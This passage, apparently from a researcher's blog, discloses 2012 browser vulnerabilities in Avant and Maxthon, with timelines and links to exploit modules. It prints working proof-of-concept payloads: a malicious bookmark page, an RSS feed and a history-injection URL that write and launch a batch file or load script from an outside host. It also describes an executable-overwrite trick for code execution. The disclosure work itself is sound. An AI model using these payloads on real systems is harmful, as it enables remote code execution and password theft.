<br />
<a href="https://github.com/malerisch/beef/tree/avant_browser/modules/exploits/avant_steal_history">https://github.com/malerisch/beef/tree/avant_browser/modules/exploits/avant_steal_history</a></div>
<br />
<div>
<b>Video</b></div>
<br />
Avant Browser - BeEF - History Stealing exploit video<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/I4LiSfTmuM0?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<br />
07/03/2012 - Posted 10 posts to a forum to get a security contact<br />
14/03/2012 - Reception of report confirmed but no further reply<br />
14/03/2012 - Chased them, no reply<br />
03-05/2012 - 2 new releases following the report, one bug silently fixed<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<br />
<b>Solution</b><br />
<br />
Do not use Avant browser.<br />
<br />
<b>Maxthon - Incorrect Executable File Handling and Same Origin Policy Implementation</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December 5, 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Patched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Incorrect Executable File Handling</b><br />
<br />
<br />
The way the Maxthon browser handles local executable files appears to stem from the fact that external tools such as Calc, Desktop and others can be launched from the browser itself. This design is insecure, as it allows JavaScript to invoke an executable directly. As shown in previous exploits, this design can aid exploitation by chaining different vulnerabilities together, allowing arbitrary command execution.<br />
<br />
This vulnerability can be exploited in multiple ways:<br />
<div>
<br />
<b>Scenario 1</b></div>
<ol>
<li>User visits a page which invokes the window.open() function against an executable file – e.g. file:///C:/windows/system32/cmd.exe</li>
<li>User unblocks the pop up blocker</li>
</ol>
<br />
<b>Scenario 1 - Impact</b><br />
The file:// URL opens in a new window, SOP is not enforced, and this vulnerability would allow arbitrary code execution.<br />
<br />
<b>Scenario 2</b><br />
The user is tricked into bookmarking an executable file<br />
<br />
<b>Scenario 2 - Impact</b><br />
The executable is run directly by Maxthon. The user is not prompted either to download the executable or to discard the download.<br />
<br />
<b>Scenario 3</b><br />
A SOP vulnerability was discovered that would allow direct access to the file:// zone from an untrusted zone<br />
<br />
<b>Scenario 3 - Impact</b><br />
Arbitrary command execution.<br />
<br />
<br />
<b>Same Origin Policy (SOP) Incorrect Implementation</b><br />
<br />
It is possible to bypass the Same Origin Policy (SOP) by using the window.open() method against the about: URI scheme. Such URIs are mapped to the privileged zone mx://res/*. However, when window.open() is invoked directly against mx://res/, the SOP is applied and access is forbidden. The following list summarises the test cases conducted with the window.open() method:<br />
<ol>
<li>http:// -> file:// - Prompts a popup blocker, if the user allows the pop up, the file:// window is opened.</li>
<li>http:// -> about:* - Spawns a new window</li>
<li>http:// -> mx://res/* - Forbidden by SOP</li>
</ol>
<b>Timeline</b><br />
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.<br />
<br />
<b>Maxthon - Cross Context Scripting (XCS) - Bookmark Toolbar and Bookmark Sidebar</b><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December 5, 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.3.3.1000 and previous versions<br />
Status: Patched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting</b><br />
<br />
<a href="http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/">Cross Context Scripting</a> (XCS) is a particular code injection attack vector where the injection occurs from an untrusted zone (e.g. Internet) into a privileged browser zone. In this case, it is possible to inject arbitrary JavaScript/HTML code from an untrusted page into Maxthon browser privileged zone - mx://res/*.<br />
<br />
<br />
<b>Description</b><br />
<br />
It is possible to inject a JavaScript/HTML payload via the “title” parameter of the “Add to Favorites” form. In Maxthon, the bookmark UI security controls are weak and allow trivial exploitation, even against an attentive user, considering the following factors:<br />
<ul>
<li>window.external.addFavorite() can be invoked in an automated fashion;</li>
<li>The title entry can be tailored to hide the injection payload;</li>
<li>URL of the bookmark can remain legitimate: e.g. www.google.com</li>
</ul>
The following screen shot shows an innocuous-looking bookmark title and URL. The URL is correct, but the title element contains malicious JavaScript code which is not directly visible.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcxTywQdKhQU7mm3GkHDlJCbR5ZNi27d5l3N7TXh6Sq6mT_BJPJ_cZm2uQMft689M075QPeeCGeSDapCFopzFNBPp3eN5bwtt0v-R92myaG8Yext9Yr_wYAPyGPub9YLVrplOTAvhoqX4/s1600/addtofavorite.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcxTywQdKhQU7mm3GkHDlJCbR5ZNi27d5l3N7TXh6Sq6mT_BJPJ_cZm2uQMft689M075QPeeCGeSDapCFopzFNBPp3eN5bwtt0v-R92myaG8Yext9Yr_wYAPyGPub9YLVrplOTAvhoqX4/s1600/addtofavorite.png" /></a></div>
<div>
<br /></div>
<div>
<div>
The injected code is rendered at mx://res/sidebar/favorites/index.htm </div>
<div>
<br /></div>
<div>
Injection occurs under the following conditions/actions:</div>
<div>
<ul>
<li>User opens the Favorites sidebar on the left (just clicking on the Star icon, without clicking the malicious bookmark);</li>
<li>User clicks on the bookmark link from the bookmark toolbar;</li>
<li>User navigates to another tab after having added the malicious bookmark.</li>
</ul>
</div>
<div>
<b><br /></b></div>
<div>
<b>Exploitation</b></div>
</div>
<br />
This vulnerability can be exploited in several ways. As the injection point is in the mx://res/ privileged browser zone, it is possible to bypass Same Origin Policy (SOP) protections, and also access Maxthon native JavaScript privileged functions which can be invoked from the Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read and write from the file system, as well as execute arbitrary commands, steal stored passwords, or modify Maxthon configuration.<br />
<br />
<b>Malicious Add to Favorite Injection – HTML Source Code</b><br />
<br />
<i><html></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><head></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><title>Google</title></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><script></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>evilpayload='location.href="file:///C:/windows/system32/calc.exe";'</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>padding="Google - www.google.com"</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>padding2=" "</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>padding3=" - the best search engine - bookmark now!!!"</i><br />
<i>window.external.addFavorite("www.google.com",padding+"'><scri"+"pt>"+evilpayload+"</"+"script>"+" "+" "+padding+padding3)</i><br />
<i><br /></i>
<i></script></i><br />
<i></head></i><br />
<i><body></i><br />
<i><h3>Maxthon 3.3.3.1000 - Cross Context Scripting via Bookmark (title parameter) - Code Execution PoC</h3></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><font size="+1">Roberto Suggi Liverani - <a href="http://blog.malerisch.net">http://blog.malerisch.net</a> - <a href="https://twitter.com/malerisch">@malerisch</a></font></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><br>Steps:</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><ul></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User is prompted to bookmark an innocuous looking bookmark, like the one shown in the middle of the screen. The injected payload can only be seen if the user scrolls on the left of the title element.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User adds the bookmark.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User then clicks on the Star (Favorites) icon or</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>User clicks on the bookmark link from the bookmark toolbar.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><li>In both cases, calc.exe is executed.</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span></ul></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>The code for the exploit:<br></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span><code></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>evilpayload='location.href="file:///C:/windows/system32/calc.exe";'</i><br />
<i>window.external.addFavorite("www.google.com","yourpaddinghere'><scri"+"pt>"+evilpayload+"</"+"script>andpaddinghere");</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span></code></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span></body></i><br />
<i></html></i><br />
<div>
<br /></div>
<br />
<b>Video</b><br />
<br />
Maxthon - Cross Context Scripting (XCS) - Bookmark Toolbar and Bookmark Sidebar<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/YR0RQz45t3M?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.<br />
<br />
<b>Maxthon - Privileged API Available On i.maxthon.com</b><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December 6, 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Patched<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
<br />
<br />
<br />
<b>Privileged APIs Available on i.maxthon.com</b><br />
<br />
The web site i.maxthon.com can access and use the privileged Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read the last visited pages or favorites, as shown in the following screen shot. Such information can only be retrieved by using privileged Maxthon functions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbJzALfZagjT7fNww0Qm-V-IFDr6IfuJJWTm8BSOBTsTzinEDeKSXPmbjTIqD4Iqp6m2iLoCFpF-WgU3MZrWn6GLYnOvEHaEByd0Zytd-pFev5f4SRPe0y-2kz1asqGjyy-Bf4Fx496w/s1600/s11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhbJzALfZagjT7fNww0Qm-V-IFDr6IfuJJWTm8BSOBTsTzinEDeKSXPmbjTIqD4Iqp6m2iLoCFpF-WgU3MZrWn6GLYnOvEHaEByd0Zytd-pFev5f4SRPe0y-2kz1asqGjyy-Bf4Fx496w/s1600/s11.png" /></a></div>
<br />
Different issues were identified regarding this design:<br />
<ol>
<li>No control on resolution of IP address for i.maxthon.com domain;</li>
<li>No use of SSL to serve the i.maxthon.com web site;</li>
<li>Use of icon "Trusted site" on the URL bar even when i.maxthon.com resolves to a different IP address.</li>
</ol>
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways, as listed below:<br />
<ul>
<li>DNS poisoning - Force resolution of i.maxthon.com to a controlled IP address</li>
<li>HTTP MiTM attack - malicious proxy which alters page content</li>
<li>Exploit XSS vulnerability in real i.maxthon.com site</li>
</ul>
Once it is possible to successfully perform one of the above attacks, then it would be possible to access Maxthon native JavaScript privileged functions which can be invoked from the Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read and write from the file system, as well as execute arbitrary commands, steal stored passwords, or modify Maxthon configuration.<br />
<div>
<br /></div>
<b>Video</b><br />
<br />
Maxthon - i.maxthon.com (DNS compromise scenario)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/1IqZBS0O2Hs?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both;">
<b>Timeline</b></div>
<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.<br />
<br />
<b>Maxthon - Cross Context Scripting (XCS) - RSS - Remote Code Execution</b><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December 5, 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Unpatched (at the time of publishing)<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting</b><br />
<br />
<a href="http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/">Cross Context Scripting</a> (XCS) is a particular code injection attack vector where the injection occurs from an untrusted zone (e.g. Internet) into a privileged browser zone. In this case, it is possible to inject arbitrary JavaScript/HTML code from an untrusted page into Maxthon browser privileged zone - mx://res/*.<br />
<br />
<br />
<b>Description</b><br />
<br />
A malicious user can inject arbitrary JavaScript/HTML code via multiple RSS feed elements. Vulnerable elements are the following:<br />
<br />
<ul>
<li><b><span style="color: red;"><title></span></b> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using HTML encoded payload</li>
<li><span style="color: red;"><b><link></b></span> element:<span class="Apple-tab-span" style="white-space: pre;"> </span>JavaScript injection using javascript: pseudouri</li>
<li><span style="color: red;"><b><description></b></span> element: JavaScript injection using HTML encoded payload</li>
</ul>
<br />
Injection is possible in two different conditions:<br />
<br />
<b>[1] User directly visits a malicious RSS page: e.g. http://x.x.x.x/maliciousrss.xml</b><br />
<br />
In this case, the injection is rendered at the following point: mx://res/app/%7BGUID%7B/preview.htm?http://x.x.x.x/maliciousrss.xml<br />
<br />
<b>[2] User views or saves the malicious feed using Maxthon Feed Reader built-in component.</b><br />
<br />
The Feed Reader is located at about:reader, which is mapped to the mx://res/app/%7BGUID%7B/reader.htm page. If the malicious feed is saved, the injection is stored as well within the about:reader page.<br />
<br />
Maxthon has to render the attack page in "UltraMode" to be affected by this vulnerability. UltraMode is set by default in Maxthon and makes use of WebKit.<br />
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways. As the injection point is in the mx://res/ privileged browser zone, it is possible to bypass Same Origin Policy (SOP) protections, and also access Maxthon native JavaScript privileged functions which can be invoked from the Maxthon DOM object (e.g. maxthon.*). Such Maxthon object interfaces can be used to read and write from the file system, as well as execute arbitrary commands, steal stored passwords, or modify Maxthon configuration.<br />
<br />
A malicious user would need to convince a user to visit a link to exploit this vulnerability.<br />
<br />
<b>Malicious RSS Feed – Arbitrary Code Execution Exploit</b><br />
<br />
<br />
<?xml version='1.0' encoding="ISO-8859-1"?><br />
<rss version='2.0'><br />
<channel><br />
<description>Malerisch.net</description><br />
<link>http://blog.malerisch.net/</link><br />
<title>Malerisch.net</title><br />
<item><br />
<title>test'&gt;&lt;img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';&gt;</title><br />
<link>javascript:alert(window.location);</link><br />
<description>07/09/2008 - test &lt;img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';&gt;</description><br />
<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate><br />
</item><br />
</channel><br />
</rss><br />
<div>
<br /></div>
<br />
<b>Metasploit module</b><br />
<br />
Following disclosure of the bugs during the <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">HITB2012AMS conference</a>, it was observed that the maxthon.program object had been silently removed by Maxthon in recent versions. This leaves a malicious user able only to read and write files on the system.<br />
<br />
Code execution without triggering a warning or user prompt can still be achieved by overwriting an executable which the browser itself invokes. A "dirty" way is to overwrite j2plauncher.exe, assuming the victim has either a JRE or a JDK installed on the machine. The second step is to force Maxthon to load java.exe (e.g. create an iframe that points to a page which loads a Java applet). This approach was successfully tested on Windows 7.<br />
<br />
On Windows XP there are more executable files that can be overwritten, e.g. C:\Program Files\Outlook Express\wab.exe, after which the browser can be forced to invoke wab.exe via window.location='ldap://dummy'.<br />
<br />
The PoC Metasploit module includes the "dirty" Java overwrite approach described above.<br />
<br />
<a href="https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_rss_xcs.rb">https://github.com/malerisch/metasploit-framework/blob/maxthon3/modules/exploits/windows/browser/maxthon_rss_xcs.rb</a><br />
<br />
<b>Video</b><br />
<br />
Maxthon - Cross Context Scripting (XCS) - RSS - Java overwrite technique - Metasploit in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/d-55asVLqNI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<b>Timeline</b></div>
<br />
13/02/2012 - Bug reported to multiple contacts<br />
21/02/2012 - Reception of report confirmed but no further reply<br />
21/02/2012 - Chased vendors - no reply<br />
12/05/2012 - HITB2012AMS - bug disclosed during <a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">presentation</a><br />
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed<br />
14/11/2012 - HackPra - bug and exploit module <a href="http://t.co/jJ8cXF9n">presented</a><br />
<br />
<b>Solution</b><br />
<br />
Do not use Maxthon browser.<br />
<br />
<b>Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s1600/maxthon-browser-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkFnvyzn4o6esG1y-1F9_INtJdGYK-JERXcwvAbN2y_028UJQZQDsDImXPWs0Nlkaq37TYJ4c3eXxFBMXomtFaGWGqHE2wgOiG9jA_I_pWX8qIfiYgKquwihkSbhDKtN9ySnWRKcc0ck/s200/maxthon-browser-1.png" width="200" /></a></div>
<b>Details</b><br />
<br />
Vendor Site: Maxthon (www.maxthon.com)<br />
Date: December 5, 2012 – CVE (TBA)<br />
Affected Software: Maxthon 3.4.5.2000 and previous versions<br />
Status: Unpatched (at the time of publishing)<br />
Researcher: Roberto Suggi Liverani - <a href="https://twitter.com/malerisch">@malerisch</a><br />
PDF version: <a href="http://www.security-assessment.com/files/documents/advisory/Maxthon_multiple_vulnerabilities_advisory.pdf">Maxthon_multiple_vulnerabilities_advisory.pdf</a><br />
<br />
<br />
<b>Cross Context Scripting</b><br />
<br />
<a href="http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/">Cross Context Scripting</a> (XCS) is a particular code injection attack vector where the injection occurs from an untrusted zone (e.g. Internet) into a privileged browser zone. In this case, it is possible to inject arbitrary JavaScript/HTML code from an untrusted page into Maxthon browser privileged zone - mx://res/*.<br />
<br />
<br />
<b>Description</b><br />
<br />
A malicious user can inject arbitrary JavaScript/HTML code through the web sites visited with the Maxthon browser. The injected code is rendered in the History page (about:history), which displays the URL and a short description of each visited page. A malicious user can inject JavaScript/HTML content by using the location.hash property, as shown below:<br />
<br />
http://x.x.x.x/maliciouspage.html<b><span style="color: red;">#"><img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")'></span></b><br />
<br />
The injected payload is rendered in both the <img> and <a> elements of a history item, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRmc75loXYkXUpMjd6DpSXiFKJSljSIkRDGQaxcZ76NsPapArJ97WEm2L1evGKn8IK0xfYjeaImF_g94grEE7s0G2qjeT83DwOH2cjDIV-ivwnp7z0J2LptiL8pr-OcY9GvwePZrHk0Qs/s1600/maxthon_xcs_inj1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRmc75loXYkXUpMjd6DpSXiFKJSljSIkRDGQaxcZ76NsPapArJ97WEm2L1evGKn8IK0xfYjeaImF_g94grEE7s0G2qjeT83DwOH2cjDIV-ivwnp7z0J2LptiL8pr-OcY9GvwePZrHk0Qs/s1600/maxthon_xcs_inj1.png" /></a></div>
<br />
<br />
More recently, after some silent fixes from Maxthon, only a single injection point remains. about:history is mapped to mx://res/history/index.htm, as shown in the screen shot below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicTSRHIIwy1g9D1Secr5lgmTRzW9V0WCn2bfCuQhpZh_PBUi8b7Dm-XaQcOX6rhccRoB6Aau8iq_1JCG3bZIEa6fb3XnhFfMC9EOLq2hxHA-QVsHVmyPjeJeX3TUFQusNPanK5KeozJ7M/s1600/xcs_abouthistory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicTSRHIIwy1g9D1Secr5lgmTRzW9V0WCn2bfCuQhpZh_PBUi8b7Dm-XaQcOX6rhccRoB6Aau8iq_1JCG3bZIEa6fb3XnhFfMC9EOLq2hxHA-QVsHVmyPjeJeX3TUFQusNPanK5KeozJ7M/s320/xcs_abouthistory.png" width="320" /></a></div>
<br />
<b>Exploitation</b><br />
<br />
This vulnerability can be exploited in several ways. As the injection point is in the mx://res/ privileged browser zone, it is possible to bypass Same Origin Policy (SOP) restrictions and to access Maxthon's native privileged JavaScript functions, which are exposed through the Maxthon DOM objects (e.g. maxthon.*). These object interfaces can be used to read from and write to the file system, execute arbitrary commands, steal stored passwords, or modify the Maxthon configuration.<br />
<br />
A malicious user only needs to convince the victim to visit a link to exploit this vulnerability.<br />
<br />
The exploitation is divided into three phases:<br />
<br />
<b>[1] Create an entry in the history page which contains the injection - injection via location.hash</b><br />
<i><br /></i>
<i>http://x.x.x.x/maliciouspage.html<b><span style="color: red;">#<script src=http://malicious/malicious.js></script></span></b></i><br />
<br />
<b>[2] Redirect the browser to the about:history page to trigger execution in the Maxthon trusted zone</b> - maliciouspage.html would contain something like:<br />
<i><br /></i>
<i><body><script>window.location='<b><span style="color: red;">about:history</span></b>';</script></body></i><br />
<br />
Note that this redirection should not be possible: it is invoked from a page on the Internet (http://) and, given the protocol mismatch, the same-origin policy should stop a web page from navigating into the privileged about:/mx:// zone.<br />
<br />
<b>[3] Invoke privileged Maxthon DOM API interfaces/objects to achieve remote code execution</b><br />
<br />
From about:history, which is mapped to mx://, it is possible to invoke special DOM API interfaces and objects, such as maxthon.io and maxthon.program. These privileged objects can be misused to achieve code execution.<br />
<br />
<b>Metasploit module</b><br />
<br />
